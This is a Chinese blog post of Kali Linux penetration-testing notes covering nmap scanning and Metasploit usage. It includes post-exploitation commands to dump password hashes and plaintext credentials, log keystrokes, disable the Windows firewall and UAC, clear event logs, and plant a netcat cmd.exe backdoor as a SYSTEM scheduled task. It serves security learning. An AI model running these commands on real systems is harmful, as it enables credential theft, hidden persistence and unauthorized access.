Kali Linux安全测试实战:用户切换、密码修改与网络扫描

已于 2024-07-16 10:35:30 修改
阅读量386 收藏 5
点赞数 9
分类专栏: linux 文章标签: linux 运维 服务器
于 2024-06-27 21:00:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71332744/article/details/140019122
版权

大家好,今天我将分享一些在Kali Linux中进行安全测试的实用技巧。以下是我在学习过程中整理的一些操作步骤和心得。

一、用户切换与密码修改

  1. su [username]:切换到其他用户 命令示例:su john(切换到用户john)

  2. passwd [username]:更改用户密码 命令示例:passwd john(更改用户john的密码)

二、网络扫描

  1. nmap:网络扫描工具 命令示例:nmap 192.168.1.0/24(扫描192.168.1.0/24网段)
    • TCP全开扫描:nmap -sT 192.168.1.1
    • SYN半开扫描:nmap -sS 192.168.1.1
    • Version扫描:nmap -sV 192.168.1.1

三、Metasploit利用

  1. msfconsole:进入Metasploit框架 命令示例:msfconsole

  2. 查找并使用脚本

    • 查找脚本:search name
    • 使用脚本:use name
    • 查看脚本参数:show options
    • 设置参数:set option-name value
    • 运行脚本:run

  3. 退出Metasploit

    • 退出框架:quit
    • 退出脚本:back

4.Meterpreter命令

  • 获取当前用户:getuid
  • 获取哈希后的系统用户信息:hashdump
  • 加载kiwi模块:load kiwi
  • 读取系统账户信息明文:creds_all
  • 进程迁移:migrate [pid]
  • 开启键盘记录:run post/windows/capture/keylog_recorder

四、增加防火墙规则与植入后门

  1. 进入Windows Shell并处理乱码

    • 进入Shell:shell
    • 处理乱码:chcp 65001

  2. 防火墙操作

    • 开启/关闭防火墙:netsh advfirewall set allprofiles state off/on
    • 添加入站规则:netsh firewall add portopening tcp 444 name enable all

  3. 修改注册表以禁用UAC

    • 命令示例:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

  4. 清除日志

    • 命令示例:clearev

  5. 植入后门

    • 上传文件:upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
    • 创建计划任务:schtasks /create /tn "nc" /ru system /tr "c:\windows\system32\nc.exe -Ldp 444 -e cmd.exe" /sc onstart

五、DoS攻击与防护

  1. CVE-2015-1635防护

    • 关闭IIS缓存
    • 安装补丁

  2. MS编号与CVE编号

    • MS编号:微软漏洞命名方式,如MS08-027
    • CVE编号:通用漏洞披露,如CVE-2015-1635

总结:

通过本文,我们学习了在Kali Linux中进行用户切换、密码修改、网络扫描以及使用Metasploit框架进行安全测试的方法。这些技能对于安全测试人员来说至关重要。在实际操作中,请确保遵守法律法规,不要进行未授权的测试。

如有疑问,欢迎在评论区留言交流。谢谢阅读

王同学_116
关注
  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kali Linux-网络安全实战-使用msf扫描靶机上mysql服务的空密码
xueshenlaila的博客
12-22 5851
实战-使用msf扫描靶机上mysql服务的空密码 我们启动一台Metasploitable2-Linux靶机网络模式为桥接IP:192.168.1.180 登录Metasploitable2-Linux系统用户名root,密码:123456 输入ip a 查看ip地址 登录Kali开始搜索模块 msf6> search mysql_login 加载模块 msf6 > use auxiliary/scanner/mysql/mysql_login 查看模块配置项 msf6 auxilia
Kali Linux渗透测试技术详解_渗透测试入门
javagty6778的博客
03-12 828
Kali Linux作为攻击端,为了以后能模拟漏洞场景,我还装了一个Debian11的虚拟机,Debian 11是官网下载的镜像文件,在Vmware中安装的时候有图文提示,一路安装正常,也设置了普通用户和root的登录密码,默认安装成功进入了图形化界面,作为专业开发我肯定想让他进入命令行模式,我在图形登录界面试了一下Ctro+Alt+F1-F6试了一下,Ctro+Alt+F3进入命令行,然后切换到root用户。阅读永远是最有效的方法,尽管书籍并不一定是最好的入门方式,但书籍的理解需要一定的基础;
Kali渗透实战:3分钟搞定Kali Linux安装,超详细教程(附安装包)
admin_man的博客
06-12 1107
相信很多同学在刚接触网络安全的时候,都听过kali linux的大名!
渗透测试工具Kali Linux安装与使用
java后端开发的博客,不仅仅是后端开发
06-22 4万+
开始研究web渗透测试,本文是第一篇:Kali Linux工具安装,后面会更新实战类的一系列文章,感兴趣的童鞋可以关注我,一起学习吧!
Kali Linux渗透测试教程:解锁黑客之门
微赚淘客系统开发者博客
12-28 944
Kali Linux是一款专为渗透测试和网络安全而设计的Linux发行版。它集成了大量的渗透测试工具,旨在提供渗透测试、安全研究、漏洞分析等方面的支持。使用Kali Linux,你可以模拟攻击者的角色,发现系统中的漏洞,并采取相应的安全措施。Kali Linux渗透测试是网络安全领域的一门重要技能,它能够帮助你理解系统漏洞、提高对网络安全的认知。通过学习和实践Kali Linux渗透测试,你将能够更好地保护网络安全,也能够更好地理解黑客攻击的原理。
【渗透测试】kali使用教程(一):常用命令和基本工具使用
u011871680的博客
12-03 4万+
kali教程
网络安全--Kali使用mdk3攻击wifi(详细教程)
懷淰メ的博客
07-10 2万+
本次依然使用Kali系统,配合mdk3进行wifi伪造、连接设备查看、解除认证攻击。 本次实验只用于学习交流,攻击目标为自家的路由WiFi,请勿违法!3070或者8187网卡,博主使用的是某鱼上买的二手8187网卡。 大家也可以根据下面的表格选择合适的网卡。 在上面的表格中,列出了支持的网卡驱动、制造商、是否作为AP、是否支持监听及支持的协议模式。在表格中,?表示不确定,yes表示支持,no表示不支持。使用Windows主流虚拟机软件:VMware虚拟机系统是重点,选用的是Kali系统,也可以选用支持md
网络安全--通过握手包找回WiFi密码(详细教程)
热门推荐
懷淰メ的博客
07-30 4万+
本文实验使用CDLinux配合minidwep-gtk工具通过破解握手包破解WiFi。本次实验只用于学习交流,攻击目标为自家的路由WiFi,请勿违法!ewsa破解版(全称ElcomsoftWirelessSecurityAuditor),它是来自俄罗斯的一款方便实用、拥有强大的无线网络wifi密码破解功能,而它工作原理就是利用密码词典去暴力破解无线AP上的WPA和WPA2密码。软件中的密码词典支持字母大小写、数字替代、符号顺序变换、缩写、元音替换等12种变量设定。最后送大家一个EWSA注册码。......
Kali Linux渗透测试实战 2.2 操作系统指纹识别
玄魂工作室
12-29 4875
识别目标主机的操作系统,首先,可以帮助我们进一步探测操作系统级别的漏洞从而可以从这一级别进行渗透测试。其次,操作系统和建筑在本系统之上的应用一般是成套出现的,例如LAMP或者LNMP。操作系统的版本也有助于我们准确定位服务程序或者软件的版本,比如windows server 2003 搭载的IIS为6.0,windows server 2008 R2 搭载的是IIS7.5。 操作系统指纹识别技术多种多样,这里我简要介绍我所知道的几种常用技术,不会具体深入到细节中,若您感兴趣可自己查阅资料。
kali linux安全渗透教程_网络攻防_安全测试_KaliLinux安全渗透_
10-02
详细介绍如何使用kali linux进行网络攻防,渗透测试等
网络攻防安全kali Linux漏洞扫描
06-18
网络攻防 网络安全 kali Linux 漏洞扫描教程
Kali Linux渗透测试实战
03-10
Kali Linux渗透测试实战 如果您之前使用过或者了解BackTrack系列Linux的话,那么我只需要简单的说,Kali是BackTrack的升级换代产品, 从Kali开始,BackTrack将成为历史。如果您没接触过BackTrack也没关系,我们从头...
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,...课程主要内容:学习Kali Linux安全测试使用工具的使用,以及高级技巧的使用
Kali Linux实战 Nmap(网络安全扫描器)
02-08
Kali Linux 中,Nmap 是一个功能强大的网络扫描工具,能够快速地映射网络上活动的主机和服务。下面是关于 Nmap 在 Kali Linux 中的实战指南。 Nmap 的基本概念 Nmap 是 Network Mapper 的缩写,由 Gordon Lyon ...
接着探索Linux的世界 -- 基本指令(文件查看、时间相关、打包压缩等等)
weixin_73359101的博客
07-14 1682
命令输出到某个指定文件中,而不是输出到终端屏幕或终端窗口。我们从键盘输入什么,cat命令就打印什么。命令 + >> + 目标文件名。: 将命令的结果写入目标文件中;这两条指令的作用等价。
linux的学习(四):磁盘,进程,定时,软件包的相关命令
weixin_45037073的博客
07-14 1142
关于磁盘管理,进程管理,定时任务,软件包管理的命令的使用。
linux dev shm扩容
hello__bug的博客
07-14 262
ctrl + x 保存。
Linux 权限
最新发布
includemainprinf的博客
07-18 503
Linux操作系统中,权限管理是一个至关重要的概念,它确保了系统的安全性和稳定性。同时可以在工作中,设置对象的权限,就算我们很多人使用一台服务器,我们也可以让别人看不到我们文件的内容,或者让别人无法对自己的文件进行操作!
2023版Kali Linux高级渗透测试指南:保障网络安全
精通Kali Linux 高级渗透测试2023版本是一本实用的指南,对于寻求在现代网络安全环境中保持领先的专业人士和对渗透测试感兴趣的个人而言,具有很高的参考价值和实战指导意义。通过学习这本书,读者将能够增强自己的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值